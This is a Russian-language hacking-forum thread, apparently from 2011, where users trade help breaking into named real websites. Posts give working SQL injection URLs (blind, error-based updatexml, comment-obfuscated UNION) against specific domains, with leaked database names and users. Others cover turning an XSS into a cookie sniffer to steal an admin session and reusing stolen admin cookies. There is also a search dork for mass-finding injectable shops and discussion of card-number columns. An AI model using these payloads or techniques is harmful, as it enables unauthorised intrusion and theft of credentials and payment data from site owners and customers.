Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    247
    Likes Received:
    55
    Reputations:
    34
    Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?
     
  2. er9j6@

    [email protected] Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    Только blind.
    http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)
     
    1 person likes this.
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Если белая страница, или вырубает на главную, значит запрос неверный, что тут непонятного??
    Поля подобрать можно :D их 14 :)
     
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    всё ещё нуждаюсь в ответе как найти?
     
  5. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Смотря, какой сервер стоит :)
     
  6. Kudos

    Kudos New Member

    Joined:
    22 Aug 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о
    Внимание вопрос:
    Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    http://forum.antichat.ru/thread229555.html
     
    _________________________
  8. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    107
    Likes Received:
    17
    Reputations:
    7
    Таблица:
    wp_options
    в ней данные о урл блога
     
  9. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    Code:
    http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x
    не пойму как дальше таблицы и колонки вывести
     
  10. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,319
    Likes Received:
    304
    Reputations:
    86
    Code:
    http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+
    Прошу помощи в раскрутке.
     
  11. er9j6@

    [email protected] Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    MySQL Error: Duplicate entry '5.0.92-community:linley5_tlgcms:[email protected]:unknow' for key 1

    MySQL Error: Duplicate entry 'linley5_tlgcms:cms_accounts: password1' for key 1
     
    #17931 [email protected], 24 Sep 2011
    Last edited: 24 Sep 2011
    2 people like this.
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    http://www.euromet.ru/search/?search=ololo'%20and%20updatexml(0x03b,concat(0x3b,(select%20table_name%20FROM%20information_schema.tables%20limit%200,1)),0x03b)--%20x

    Error Number: 1105 XPATH syntax error: ';CHARACTER_SETS'

    =\\
     
    #17932 Tigger, 24 Sep 2011
    Last edited: 24 Sep 2011
    2 people like this.
  13. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    1
    Что можно с этим сделать?
    [​IMG]
    Полный размер
    И что это за хеши внизу, точнее от чего они?
     
  14. er9j6@

    [email protected] Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    Похекать шоп не получится, так как стоит 4 ветка MySQL.

    4.1.22-standard:theqice_manicefruit:[email protected]: pc-linux-gnu
     
    #17934 [email protected], 24 Sep 2011
    Last edited: 24 Sep 2011
  15. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    1
    При регистрации в поле вопрос я ввел "><script>alert(/XSS/)</script> потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/
    Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)
     
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    627
    Likes Received:
    61
    Reputations:
    53
    проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл.

    может быть привязка к ip? есть еще варианты?
     
    #17936 justonline, 25 Sep 2011
    Last edited: 25 Sep 2011
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    нет доступа к inf. schema - не значит, что похекать не получится.
     
    1 person likes this.
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Всё получиться :)
    То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц.


    Префикс таблиц: 'theqice_'

    Дорк:
    Code:
    inurl:"prodisp.php?prodcatind"
    Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.
     
    #17938 randman, 25 Sep 2011
    Last edited: 25 Sep 2011
    1 person likes this.
  19. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    627
    Likes Received:
    61
    Reputations:
    53
    а не проще поставить такой двиг себе на машину?)
     
  20. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    178
    Likes Received:
    18
    Reputations:
    9
    вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится
     
Loading...
Thread Status:
Not open for further replies.